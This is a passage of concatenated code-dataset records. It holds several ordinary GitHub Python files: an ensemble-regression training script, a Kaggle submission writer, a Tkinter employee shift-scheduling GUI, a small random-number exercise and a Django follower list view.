print('Bayes_Optimization(extra_tree)')\n            n_es, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_extratree(train_X = train_X, train_Y = train_Y) \n            extra_tree = ExtraTreesRegressor(n_estimators=int(n_es),max_depth=int(max_dep), max_features=int(max_fea),\n                                             min_samples_leaf=int(min_s_l), min_samples_split=int(min_s_s), n_jobs=-1,bootstrap=True)\n            #adaboost\n            print('Bayes_Optimization(adaboost)')\n            n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_Adaboost(train_X = train_X, train_Y = train_Y) \n            Adaboost = ensemble.AdaBoostRegressor(\n                DecisionTreeRegressor( max_features = max_fea, max_depth = max_dep, \n                                       min_samples_split = min_s_s,min_samples_leaf = min_s_l, random_state = 2),\n                n_estimators = n_es,learning_rate = l_ra)\n            #RandomForest\n            print('Bayes_Optimization(RandomForest)')\n            n_es, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_RandomForest(train_X = train_X, train_Y = train_Y) \n            RandomForest = ensemble.RandomForestRegressor(n_estimators = n_es,\n                                                          max_features = max_fea, max_depth = max_dep, \n                                                          min_samples_split = 
min_s_s, min_samples_leaf = min_s_l, \n                                                          random_state = 2)\n            #Gboost\n            print('Bayes_Optimization(Gboost)')\n            n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s = self.bayes_optimization.Bayes_opt_GBoost(train_X = train_X, train_Y = train_Y) \n            Gboost = ensemble.GradientBoostingRegressor(max_features = max_fea, max_depth = max_dep, \n                                                        min_samples_split = min_s_s, min_samples_leaf = min_s_l, random_state = 2,\n                                                        n_estimators = n_es, learning_rate = l_ra, loss='huber')\n            #xgb\n            model_xgb = xgb.XGBRegressor(colsample_bytree=0.4603, gamma=0.0468,\n                                         learning_rate=0.05, max_depth=3,\n                                         min_child_weight=1.7817, n_estimators=2200,\n                                         reg_alpha=0.4640, reg_lambda=0.8571,\n                                         subsample=0.5213, silent=1,\n                                         random_state =7, nthread = -1)\n            #lgb\n            model_lgb = lgb.LGBMRegressor(objective='regression',num_leaves=5,\n                                          learning_rate=0.05, n_estimators=720,\n                                          max_bin = 55, bagging_fraction = 0.8,\n                                          bagging_freq = 5, feature_fraction = 0.2319,\n                                          feature_fraction_seed=9, bagging_seed=9,\n                                          min_data_in_leaf =6, min_sum_hessian_in_leaf = 11)\n            \n            \n            def get_model_score(model, x_all, y_all, n_folds=5):\n                # K-fold cross-validation to compute the r2_score\n                score_func = r2_score\n                kf = KFold(n_splits=n_folds, shuffle=True)\n                score_mean_test = 0\n                score_mean_train = 0\n                for train_idx, test_idx in kf.split(x_all):\n                    x_train = x_all[train_idx]\n                    y_train = y_all[train_idx]\n                    x_test = x_all[test_idx]\n                    y_test = y_all[test_idx]\n                    score_test, score_train = try_different_method(model, x_train, y_train, x_test, y_test, score_func)\n                    score_mean_test += score_test\n                    score_mean_train += score_train\n                score_mean_test /= n_folds\n                score_mean_train /= n_folds\n                return score_mean_test\n            \n            \n            def try_different_method(model, x_train, y_train, x_test, y_test, score_func):\n                # compute the score of one model\n                \"\"\"\n                Inner function in train_evaluate_return_best_model for model training.\n                :param model: one specific model\n                :param x_train:\n                :param y_train:\n                :param x_test:\n                :param y_test:\n                :param score_func:\n                :return score:\n                \"\"\"\n                model.fit(x_train, y_train)\n                result_test = model.predict(x_test)\n                result_train = model.predict(x_train)\n                return score_func(y_test, result_test), score_func(y_train, result_train)\n            \n            \n            class StackingAveragedModels(BaseEstimator, RegressorMixin, TransformerMixin):\n                # definition of StackingAveragedModels\n                \"\"\"\n                from https://www.kaggle.com/serigne/stacked-regressions-top-4-on-leaderboard\n                \"\"\"\n                def __init__(self, base_models, meta_model, n_folds=5):\n                    self.base_models = base_models\n                    self.meta_model = meta_model\n                    self.n_folds = n_folds\n                \n                # We again fit the data on clones of the original models\n                def fit(self, X, y):\n                    self.base_models_ = [list() for x in self.base_models]\n                    self.meta_model_ = clone(self.meta_model)\n                    kfold = KFold(n_splits=self.n_folds, shuffle=True, random_state=156)\n                    \n                    # Train cloned base models then create out-of-fold predictions\n                    # that are needed to train the cloned meta-model\n                    out_of_fold_predictions = np.zeros((X.shape[0], len(self.base_models)))\n                    for i, model in enumerate(self.base_models):\n                        for train_index, holdout_index in kfold.split(X, y):\n                            instance = clone(model)\n                            self.base_models_[i].append(instance)\n                            instance.fit(X[train_index], y[train_index])\n                            y_pred = instance.predict(X[holdout_index])\n                            out_of_fold_predictions[holdout_index, i] = y_pred.ravel()\n                    \n                    # Now train the cloned meta-model using the out-of-fold predictions as new feature\n                    self.meta_model_.fit(out_of_fold_predictions, y)\n                    return self\n                \n                # Do the predictions of all base models on the test data and use the averaged predictions as\n                # meta-features for the final 
prediction which is done by the meta-model\n def predict(self, X):\n meta_features = np.column_stack([\n np.column_stack([model.predict(X) for model in base_models]).mean(axis=1)\n for base_models in self.base_models_])\n return self.meta_model_.predict(meta_features)\n \n # =============For Esemble and Stacking(end)=============\n \n \n \n def train_evaluate_return_best_model(x_all, y_all, score_func=r2_score, fold_num=5, return_ave=False):\n \"\"\"\n Train predefined models on data using 5-fold validation\n :param x_all: ndarray containing all features\n :param y_all: ndarray containing all labels\n :param score_func: score function\n :param fold_num: fold number to use K-fold CV\n :param return_ave: return average performance on all methods?\n :return best_model: best model trained on all data\n \"\"\"\n print()\n print(\"Training model with K-fords...\")\n kf = KFold(n_splits=fold_num, shuffle=True)\n best_score = 0\n best_idx = 0\n ave_score = 0\n for (model_idx, model) in enumerate(models):\n score_mean_test = 0\n score_mean_train = 0\n for train_idx, test_idx in kf.split(x_all):\n x_train = x_all[train_idx]\n y_train = y_all[train_idx]\n x_test = x_all[test_idx]\n y_test = y_all[test_idx]\n score_test, score_train = try_different_method(model, x_train, y_train, x_test, y_test, score_func)\n score_mean_test+=score_test\n score_mean_train+=score_train\n score_mean_test /= fold_num\n score_mean_train /= fold_num\n ave_score += score_mean_test\n if not return_ave:\n print(\"{} \\t score train: {}, score test: {}\".format(model_heads[model_idx], score_mean_train, score_mean_test))\n if best_score < score_mean_test:\n best_score = score_mean_test\n best_idx = model_idx\n print(\"Training done\")\n print(\"Best model: {}\\t Score: {}\".format(model_heads[best_idx], best_score))\n if return_ave:\n print(\"Average score on {} models = {}\".format(len(models), ave_score/len(models)))\n best_model = models[best_idx]\n best_model.fit(x_all, y_all)\n return best_idx, best_model\n \n def tune_model_params(x_all, y_all):\n \"\"\"\n Tune models on data using 5-fold validation\n :param x_all: ndarray containing all features\n :param y_all: ndarray containing all labels\n :param score_func: score function\n :param fold_num: fold number to use K-fold CV\n :return best_model: best model trained on all data\n \"\"\"\n print()\n print(\"Tuning model...\")\n cv_params = {'reg_alpha': [0.05, 0.1, 1, 2, 3], 'reg_lambda': [0.05, 0.1, 1, 2, 3]}\n other_params = {'learning_rate': 0.1, 'n_estimators': 400, 'max_depth': 8, 'min_child_weight': 2, 'seed': 0,\n 'subsample': 0.8, 'colsample_bytree': 0.8, 'gamma': 0.2, 'reg_alpha': 3, 'reg_lambda': 2}\n model = xgb.XGBRegressor(**other_params)\n optimized_GBM = GridSearchCV(estimator=model, param_grid=cv_params, scoring='r2', cv=5, verbose=1, n_jobs=1)\n optimized_GBM.fit(x_all, y_all)\n evalute_result = optimized_GBM.grid_scores_\n print('Result:{0}'.format(evalute_result))\n print('Best params:{0}'.format(optimized_GBM.best_params_))\n print('Best score:{0}'.format(optimized_GBM.best_score_))\n \n def get_model(x_all, y_all, model_idx):\n \"\"\"\n Given model index return the corresponding model trained on all data\n :param x_all:\n :param y_all:\n :param model_idx:\n :return model:\n \"\"\"\n print()\n print(\"Training with all data using {}\".format(model_heads[model_idx]))\n model = models[model_idx].fit(x_all, y_all)\n return model\n \n \n '''\n print('Find best models:')\n find_best_model = False # display several preselected models' results (5-folds)\n if 
find_best_model:\n                # show some results\n                _, _ = train_evaluate_return_best_model(x_all=train_X, y_all=train_Y,\n                                                        score_func=score_function, fold_num=5)\n            '''\n            # =================================================\n            # Ensemble + stacking\n            # =================================================\n            print()\n            print(\"Ensemble start...\")\n            '''\n            score = get_model_score(lasso, train_X, train_Y)\n            print(\"\\nLasso score: {:.4f}\\n\".format(score))\n            '''\n            score = get_model_score(extra_tree, train_X, train_Y)\n            print(\"\\nextra_tree score: {:.4f}\\n\".format(score))\n            score = get_model_score(Adaboost, train_X, train_Y)\n            print(\"Adaboost score: {:.4f}\\n\".format(score))\n            score = get_model_score(RandomForest, train_X, train_Y)\n            print(\"Randomforest score: {:.4f}\\n\".format(score))\n            score = get_model_score(Gboost, train_X, train_Y)\n            print(\"Gradient Boosting score: {:.4f}\\n\".format(score))\n            score = get_model_score(model_xgb, train_X, train_Y)\n            print(\"Xgboost score: {:.4f}\\n\".format(score))\n            score = get_model_score(model_lgb, train_X, train_Y)\n            print(\"LGBM score: {:.4f}\\n\".format(score))\n            \n            \n            #stacked_averaged_models = StackingAveragedModels(base_models=(ENet, GBoost, KRR),\n                                                             #meta_model=lasso)\n            stacked_averaged_models = StackingAveragedModels(base_models=(Adaboost, RandomForest, Gboost),\n                                                             meta_model=extra_tree) \n            score = get_model_score(stacked_averaged_models, train_X, train_Y)\n            print(\"Stacking Averaged models score: {:.4f}\".format(score))\n            stacked_averaged_models.fit(train_X, train_Y)\n            stacked_train_pred = stacked_averaged_models.predict(train_X)\n            stacked_pred = stacked_averaged_models.predict(val_X)\n            print('r2 score of stack models on train data:', r2_score(train_Y, stacked_train_pred))\n            model_xgb.fit(train_X, train_Y)\n            xgb_train_pred = model_xgb.predict(train_X)\n            xgb_pred = model_xgb.predict(val_X)\n            print('r2 score of xgb on train data:', r2_score(train_Y, xgb_train_pred))\n            model_lgb.fit(train_X, train_Y)\n            lgb_train_pred = model_lgb.predict(train_X)\n            lgb_pred = model_lgb.predict(val_X)\n            print('r2 score of lgb on train data:', r2_score(train_Y, lgb_train_pred))\n            print('r2 score on train data:')\n            print(r2_score(train_Y, stacked_train_pred * 0.70 +\n                           xgb_train_pred * 0.15 + lgb_train_pred * 0.15))\n            model_ensemble = stacked_pred * 0.70 + xgb_pred * 0.15 + lgb_pred * 0.15\n            \n            self.log_factory.InfoLog(\"The score of ensemble for validation={}\".format(r2_score(val_Y, model_ensemble)))\n            # export the predictions as a correctly formatted csv file\n            ID = np.array(range(len(val_X)))\n            import pandas as pd\n            df = pd.DataFrame({'id': ID,\n                               'y': model_ensemble})\n            df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n            self.dump_validated_y(\n                stacked_averaged_models.predict(self.validation_X.cpu().numpy()) * 0.70 \n                + model_xgb.predict(self.validation_X.cpu().numpy()) * 0.15 \n                + model_lgb.predict(self.validation_X.cpu().numpy()) * 0.15)\n            #============== end of the ensemble model ======================\n            \n            \n        elif self.model_name == \"nnet\":\n            self.train_model.initialization()\n            computed_losses = []\n            train_losses = []\n            for epoch in range(self.train_model.total_epoch):\n                stride = self.full_X.shape[0] // self.k_fold\n                train_X, train_Y, test_X, test_Y = None, None, None, None\n\n                test_loss = 0.0\n                train_loss = 0.0\n                test_mse = 0.0\n                train_mse = 0.0\n                test_r2_score = 0.0\n                self.train_model.train()\n                idx = [i for i in range(self.full_X.shape[0])]\n                sampled_idx = random.sample(idx, self.full_Y.shape[0])\n                for i in range(self.k_fold):\n                    indicator = np.array([False for i in range(self.full_X.shape[0])])\n                    if i != 
self.k_fold - 1:\n indicator[sampled_idx[i * stride: (i + 1) * stride]] = True\n else:\n indicator[sampled_idx[i * stride:]] = True\n # k-fold CV\n train_X = self.full_X[indicator == False, :]\n train_Y = self.full_Y[indicator == False, :]\n test_X = self.full_X[indicator == True, :]\n test_Y = self.full_Y[indicator == True, :]\n\n self.train_model.optimizer.zero_grad()\n predicted_y = self.train_model(train_X)\n temp_loss = self.train_model.compute_loss(predicted_y, train_Y)\n temp_loss.backward()\n self.train_model.optimizer.step()\n\n with torch.no_grad():\n train_loss += temp_loss.item() / self.k_fold\n predicted_y_test = self.train_model(test_X)\n test_loss += self.train_model.compute_loss(predicted_y_test, test_Y) / self.k_fold\n train_mse += F.mse_loss(predicted_y, train_Y) / self.k_fold\n test_mse += F.mse_loss(predicted_y_test, test_Y) / self.k_fold\n test_r2_score += r2_score(test_Y.cpu().numpy(), predicted_y_test.cpu().numpy()) / self.k_fold\n\n if epoch % 200 == 0:\n self.log_factory.InfoLog(\n \"Epoch={}, while test loss={}, train loss={}, test MSE={}, train MSE={}, r2_score={}\".format(\n epoch, test_loss, train_loss, test_mse, train_mse, test_r2_score))\n computed_losses.append(test_loss.detach().clone().cpu())\n train_losses.append(train_loss)\n with torch.no_grad():\n predicted_y_validate = self.train_model(self.validation_X).squeeze(1).cpu().numpy()\n self.dump_validated_y(predicted_y_validate)\n model_evaluation(computed_losses, train_losses, epoch_step=200)\n\n def kill(self):\n self.log_factory.kill()\n\n def dump_validated_y(self, predicted_y_validate):\n np_full_Y = self.full_Y\n try:\n np_full_Y = self.full_Y.squeeze(1).cpu().numpy()\n predicted_y_validate = predicted_y_validate.cpu().numpy()\n except:\n pass\n\n if self.y_normalizer.initialized:\n predicted_y_validate = self.y_normalizer.decode(predicted_y_validate)\n np_full_Y = self.y_normalizer.decode(np_full_Y)\n\n fig = plt.figure(1)\n plt.scatter([1 for i in range(self.full_Y.shape[0])], np_full_Y, edgecolors='r')\n plt.scatter([2 for i in range(len(predicted_y_validate))], predicted_y_validate, edgecolors='b')\n fig.savefig(os.path.join(self.data_path, \"distribution.png\"))\n\n with open(os.path.join(self.data_path, \"y_validate.csv\"), 'w') as f:\n f.write(\"id,y\\n\")\n for i, pred_y in enumerate(predicted_y_validate):\n f.write(\"{},{}\\n\".format(i, pred_y))\n f.close()\n \n\n \n\n","repo_name":"GeCao/AML","sub_path":"Task1/src/CoreManagement.py","file_name":"CoreManagement.py","file_ext":"py","file_size_in_byte":37113,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"28262302358","text":"import argparse\nimport json\n\nimport pandas as pd\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"create sub\")\n\n parser.add_argument(\"exp\")\n args = parser.parse_args()\n\n with open(f\"data/output/{args.exp}.json\", \"r\") as f:\n result = json.load(f)\n\n pred = result[\"output\"][\"pred\"]\n\n sub = pd.read_csv(\"data/submit_sample.csv\", names=[\"id\", \"pred\"])\n sub[\"pred\"] = pred\n\n sub.to_csv(f\"data/subs/{args.exp}.csv\", header=False, index=False)\n","repo_name":"habroptilus/ds-monorepo","sub_path":"projects/sony/create_sub.py","file_name":"create_sub.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72671563564","text":"from tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import 
messagebox\r\nfrom tkinter.ttk import *\r\nimport EmployeeData\r\nimport Classes\r\nfrom Edit_Emp import values\r\nimport copy\r\n\r\n\r\n\r\ndef generate(gen_win):\r\n def generate_scheudle(new_emp_list, shifts, weekly_rest):\r\n def checks():\r\n #checking if the employee is not already in current shift, previous shift or next shift\r\n if shifts_sorted[x].shift_num%2 == 0:\r\n shifts_check = []\r\n i = -4\r\n while i < 6:\r\n if shifts_sorted[x].shift_num + i > 41:\r\n pass\r\n else:\r\n shifts_check.append(weekly_rest[shifts_sorted[x].shift_num + i])\r\n i += 1\r\n if new_emp_list[count].employee_number in shifts_check:\r\n return False\r\n else:\r\n shifts_check = []\r\n i = -5\r\n while i < 5:\r\n if shifts_sorted[x].shift_num + i > 41:\r\n pass\r\n else:\r\n shifts_check.append(weekly_rest[shifts_sorted[x].shift_num + i])\r\n i += 1\r\n if new_emp_list[count].employee_number in shifts_check:\r\n return False\r\n\r\n #Checking if the employee has not yet exceeded the limitation of 7 nights per 2 weeks\r\n if (shifts_sorted[x].shift_num%6 == 4 or shifts_sorted[x].shift_num%6 ==5) and new_emp_list[count].last_week_nights + 1 == 8:\r\n return False\r\n if new_emp_list[count].num_of_shifts == 0:\r\n return False\r\n return True\r\n\r\n def sort_by_weeklyshifts(elem):\r\n return elem.weekly_rest_num\r\n\r\n def sort_by_amount(elem):\r\n return elem.num_of_shifts\r\n\r\n\r\n new_emp_list = sorted(new_emp_list, key = sort_by_weeklyshifts)\r\n shifts_sorted = []\r\n for x in range(42):\r\n shifts_sorted.append(Classes.Shift(x,len(shifts[x]),copy.deepcopy(shifts[x])))\r\n shifts_sorted = sorted(shifts_sorted, key = sort_by_amount)\r\n\r\n for x in range(0,42,2):\r\n if weekly_rest[shifts_sorted[x].shift_num] == 0:\r\n found = False\r\n count = 0\r\n while found == False and count < len(new_emp_list):\r\n if new_emp_list[count].employee_number in shifts_sorted[x].list_of_employees:\r\n if checks():\r\n weekly_rest[shifts_sorted[x].shift_num]= new_emp_list[count].employee_number\r\n new_emp_list[count].num_of_shifts -= 1\r\n found = True\r\n if (shifts_sorted[x].shift_num%6 == 4 or shifts_sorted[x].shift_num%6 ==5):\r\n new_emp_list[count].last_week_nights += 1\r\n new_emp_list[count].weekly_rest_num -= 1\r\n while count15 and x<20):\r\n continue\r\n if employee_number not in shifts[x*2+1]:\r\n shifts[x*2+1].append(employee_number)\r\n weekly_counter += 1\r\n if (emp_list[employee_number-1].incharge == True):\r\n shifts[x*2].append(employee_number)\r\n weekly_counter += 1\r\n else:\r\n if employee_number in shifts[x*2+1]:\r\n shifts[x*2+1].remove(employee_number)\r\n if (emp_list[employee_number-1].incharge == True):\r\n shifts[x*2].remove(employee_number)\r\n emp_list[employee_number-1].weekly_rest_num = weekly_counter\r\n combo.configure(state = 'normal')\r\n select_btn.config(state='normal')\r\n emp_rest.destroy()\r\n\r\n\r\n\r\n emp_rest = Toplevel()\r\n emp_rest.geometry('600x300')\r\n emp_rest.title(\"Personal Employee Restrictions\")\r\n employee_number = int(combo.get().split(':')[0])\r\n headline_personal = Label(emp_rest, font = 'Ariel 14 bold underline', justify='center', text=combo.get()[2:])\r\n headline_personal.grid(row=0, pady=5)\r\n\r\n # frame for the days of the week on top\r\n frame_body = Frame(emp_rest, relief='groove')\r\n frame_body.grid(row=1, pady=10, padx=10)\r\n frame_body_head = Frame(frame_body, relief = 'groove')\r\n frame_body_head.grid(row = 0, column = 1)\r\n lbl_sun = Label(frame_body_head, text=\"Sunday\").grid(row=0, column=1, padx=10, pady=10)\r\n lbl_mon = 
Label(frame_body_head, text=\"Monday\").grid(row=0, column=2, padx=10, pady=10)\r\n lbl_teu = Label(frame_body_head, text=\"Tuesday\").grid(row=0, column=3, padx=10, pady=10)\r\n lbl_wed = Label(frame_body_head, text=\"Wednesday\").grid(row=0, column=4, padx=10, pady=10)\r\n lbl_thu = Label(frame_body_head, text=\"Thursday\").grid(row=0, column=5, padx=10, pady=10)\r\n lbl_fri = Label(frame_body_head, text=\"Friday\").grid(row=0, column=6, padx=10, pady=10)\r\n lbl_sat = Label(frame_body_head, text=\"Saturday\").grid(row=0, column=7, padx=10, pady=10)\r\n\r\n # frame for the comboboxes\r\n frame_body_left = Frame(frame_body, relief='groove')\r\n frame_body_left.grid(row=1, column=0, sticky='w')\r\n lbl_mor = Label(frame_body_left, text=\"Morning:\").grid(row=0, column=0, padx=10, pady=10)\r\n lbl_after = Label(frame_body_left, text=\"Afternoon:\").grid(row=2, column=0, padx=10, pady=10)\r\n lbl_eve = Label(frame_body_left, text=\"Night:\").grid(row=4, column=0, padx=10, pady=10)\r\n\r\n frame_body_right = Frame(frame_body)\r\n frame_body_right.grid(row=1, column=1)\r\n\r\n combo_shifts = []\r\n row2 = 0\r\n column2 = 0\r\n for x in range(21):\r\n shift_box = Combobox(frame_body_right, values='\" \" Yes', width = 5)\r\n shift_box.current(0)\r\n combo_shifts.append(shift_box)\r\n combo_shifts[x].grid(row= row2, column=column2, padx=7, pady=8)\r\n if int(combo.get().split(':')[0]) in shifts[x*2+1] or int(combo.get().split(':')[0]) in shifts[x*2]:\r\n combo_shifts[x].current(1)\r\n row2 += 1\r\n if row2%3 == 0:\r\n row2 = 0\r\n column2 +=1\r\n\r\n save_btn = Button(emp_rest, text = 'save', command = save_shifts)\r\n save_btn.grid(row = 2, pady = 8)\r\n emp_rest.protocol(\"WM_DELETE_WINDOW\", close_win)\r\n\r\n\r\n # Checking the restrictions of maximum 3 consecutive Saturdays and up to 7 nights per week\r\n # For the hand picked restrictions\r\n def check_restrictions():\r\n new_emp_list = copy.deepcopy(emp_list)\r\n weekly_rest = []\r\n for x in range(42):\r\n weekly_rest.append(int(restrictions[x].get().split(':')[0]))\r\n if (x%6 == 4 or x%6 == 5) and int(restrictions[x].get().split(':')[0]) != 0:\r\n if new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].last_week_nights + 1 == 8:\r\n messagebox.showerror('Restrictions Error',\r\n new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].name + \" cannot work more than\"\r\n \" 7 nights per 2 weeks\")\r\n return\r\n else:\r\n new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].last_week_nights += 1\r\n elif (x>31 and x<40) and (int(restrictions[x].get().split(':')[0]) != 0):\r\n if new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].saturdays + 1 == 4:\r\n messagebox.showerror('Restrictions Error', new_emp_list[int(\r\n restrictions[x].get().split(':')[0]) - 1].name + \" cannot work more than 3 consecutive Saturdays\")\r\n return\r\n if int(restrictions[x].get().split(':')[0]) > 0:\r\n if new_emp_list[int(restrictions[x].get().split(':')[0])-1].num_of_shifts > 0:\r\n new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].num_of_shifts -= 1\r\n else:\r\n pass\r\n for x in range(4):\r\n if int(last_week[x].get().split(':')[0]) == 0:\r\n messagebox.showerror('Restrictions Error', \" Last Saturday shifts fields must be filled\")\r\n return\r\n weekly_rest.append(int(last_week[x].get().split(':')[0]))\r\n generate_scheudle(new_emp_list, shifts, weekly_rest)\r\n\r\n\r\n\r\n\r\n #main part of generating the schedule\r\n emp_list = EmployeeData.importList()\r\n\r\n\r\n\r\n headline = Label(gen_win, text=\"Generate New 
Schedule\", font=\"Ariel 14 bold underline\", justify = 'center')\r\n headline.grid(row=0, pady=10)\r\n select_emp = Label(gen_win, text = \"Restrictions\", font = \"Ariel 12 bold underline\")\r\n select_emp.grid(row = 1, column = 0, padx = 10, pady = 10)\r\n\r\n\r\n #main frame for hand picking shifts\r\n frame_body = Frame(gen_win, relief = 'groove', width = 500, height = 500)\r\n frame_body.grid(row =2, padx = 10, pady = 10)\r\n\r\n #frame for the days of the week on top\r\n frame_body_head = Frame(frame_body, relief = 'groove')\r\n frame_body_head.grid(row =0, column = 1)\r\n lbl_sun = Label(frame_body_head, text=\"Sunday\").grid(row=0, column=1, padx=10, pady=10)\r\n lbl_mon = Label(frame_body_head, text=\"Monday\").grid(row=0, column=2, padx=10, pady=10)\r\n lbl_teu = Label(frame_body_head, text=\"Tuesday\").grid(row=0, column=3, padx=10, pady=10)\r\n lbl_wed = Label(frame_body_head, text=\"Wednesday\").grid(row=0, column=4, padx=10, pady=10)\r\n lbl_thu = Label(frame_body_head, text=\"Thursday\").grid(row=0, column=5, padx=10, pady=10)\r\n lbl_fri = Label(frame_body_head, text=\"Friday\").grid(row=0, column=6, padx=10, pady=10)\r\n lbl_sat = Label(frame_body_head, text=\"Saturday\").grid(row=0, column=7, padx=10, pady=10)\r\n\r\n #frame for days and positions\r\n frame_body_left = Frame(frame_body, relief = 'groove')\r\n frame_body_left.grid(row = 2, column = 0, sticky = 'w')\r\n lbl_mor = Label(frame_body_left, text=\"Morning:\").grid(row=0, column=0, padx=10, pady=10)\r\n lbl_after = Label(frame_body_left, text=\"Afternoon:\").grid(row=2, column=0, padx=10, pady=10)\r\n lbl_eve = Label(frame_body_left, text=\"Night:\").grid(row=4, column=0, padx=10, pady=10)\r\n for x in range(0,5,2):\r\n lbl_incharge = Label(frame_body_left, text = \"Incharge\")\r\n lbl_patrol = Label(frame_body_left, text = \"Patrol\")\r\n lbl_incharge.grid(row = x, column = 1, padx = 2, pady = 2)\r\n lbl_patrol.grid(row = x+1, column = 1, padx =2, pady =2)\r\n\r\n\r\n #Creates and places a weekly restrictions table for the supervisor to hand pick\r\n frame_body_main = Frame(frame_body, relief = 'groove')\r\n frame_body_main.grid(row = 2, column = 1)\r\n restrictions = []\r\n row1 = 0\r\n column1 = 0\r\n for x in range(0, 42,2):\r\n combo_shift = Combobox(frame_body_main, state='readonly', width=7)\r\n combo_shift.configure(value=values(emp_list))\r\n restrictions.append(combo_shift)\r\n restrictions[x].grid(row= row1, column=column1, padx=2, pady=5)\r\n combo_shift2 = Combobox(frame_body_main, state='readonly', width=7)\r\n combo_shift2.configure(value=values(emp_list))\r\n restrictions.append(combo_shift2)\r\n restrictions[x+1].grid(row=row1+1, column=column1, padx=2, pady=5)\r\n restrictions[x].current(0)\r\n restrictions[x+1].current(0)\r\n row1 += 2\r\n if row1%6 == 0:\r\n row1 = 0\r\n column1 +=1\r\n\r\n frame_body_right = Frame(frame_body)\r\n frame_body_right.grid(row = 2, column = 2, padx = 5)\r\n headline2 = Label(frame_body_right, font='Ariel 12 bold underline', text=\"Saturday shifts:\")\r\n headline2.grid(row=0, pady = 12, padx = 5)\r\n\r\n frame_left = Frame(frame_body_right)\r\n frame_left.grid(row=1, column=0)\r\n frame_right = Frame(frame_body_right, height = 300, width = 200)\r\n frame_right.grid(row=1, column=1)\r\n\r\n # frame for days and positions\r\n lbl_after = Label(frame_left, text=\"Afternoon:\").grid(row=0, column=0, padx=10, pady=10)\r\n lbl_eve = Label(frame_left, text=\"Night:\").grid(row=2, column=0, padx=10, pady=10)\r\n for x in range(0, 3, 2):\r\n lbl_incharge = 
Label(frame_left, text=\"Incharge\")\r\n        lbl_patrol = Label(frame_left, text=\"Patrol\")\r\n        lbl_incharge.grid(row=x, column=1, padx=2, pady=2)\r\n        lbl_patrol.grid(row=x + 1, column=1, padx=2, pady=2)\r\n    last_week = []\r\n    for x in range(4):\r\n        combo_last_week = Combobox(frame_right, width=8, value = values(emp_list))\r\n        combo_last_week.grid(row=x, padx = 10, pady = 4)\r\n        combo_last_week.current(0)\r\n        last_week.append(combo_last_week)\r\n\r\n\r\n    #This bit is for the personal restrictions that the employees themselves have sent\r\n    #creating a shifts variable: a list of lists holding, for each shift, the employees willing to work it\r\n    shifts = []\r\n    for x in range(42):\r\n        shifts.append([])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n    frame_btm = Frame(gen_win, width = 500, height = 500)\r\n    frame_btm.grid(row =3, pady=30)\r\n\r\n    combo = Combobox(frame_btm, state='readonly')\r\n    combo.configure(value=values(emp_list))\r\n    choose_emp = Label(frame_btm, text=\"Choose employee: \")\r\n    choose_emp.grid(row=0, padx=20, column=0, sticky = 'w')\r\n    combo.grid(row=0, column=1, padx=20)\r\n    combo.current(0)\r\n    select_btn = Button(frame_btm, text=\"Select\", command = personal_rest)\r\n    select_btn.grid(row=0, column=2, padx=20, sticky = 'e')\r\n\r\n    next_btn = Button(gen_win, text = \"Generate Schedule\", command = check_restrictions)\r\n    next_btn.grid(row =4, column = 0, sticky = 'e', padx = 20)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"MaEyal/Work-Schedule","sub_path":"Generate.py","file_name":"Generate.py","file_ext":"py","file_size_in_byte":19919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19401052476","text":"import random\n\n# Declare the variable n as input with integer data type\nn = int(input(\"Masukan nilai N: \"))\n# Loop to print the number of rows given by the variable n\nfor i in range(n):\n    # Print the loop counter plus 1 on each iteration, so that the first row = 1,\n    # and print a random number with float data type.\n    print(\"data ke\",i+1,\":\" , random.uniform(0, 0.5))\nprint(\"Selesai\")\n","repo_name":"antonmartinus72/labpy03","sub_path":"py/latihan1.py","file_name":"latihan1.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19774394793","text":"from django.db.models import Q\nfrom django.db.models.functions import Lower\n\nfrom base.apps.github.models import User, Follower\n\nfrom views.base import ListView\nfrom ..mixins import UserMixin\n\nclass ListView(UserMixin,ListView):\n    context_object_name = \"user_list\"\n    template_name = \"user/following/user_list.html\"\n\n    def get_queryset(self,**kwargs):\n        qs = User.objects.filter(\n            id__in=Follower.objects.filter(follower_id=self.github_user.id).values_list('user_id',flat=True)\n        )\n        q = self.request.GET.get('q','').strip()\n        if q:\n            qs = qs.filter(\n                Q(**{'login__icontains':q}) |\n                Q(**{'name__icontains':q}) |\n                Q(**{'company__icontains':q}) |\n                Q(**{'location__icontains':q})\n            )\n        return qs.order_by(Lower('login'))\n","repo_name":"andrewp-as-is/gist-list-django-server","sub_path":"views/user/following/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40967376966","text":"from image import color2gray, file2image, image2display\nfrom svd import factor\nimport 
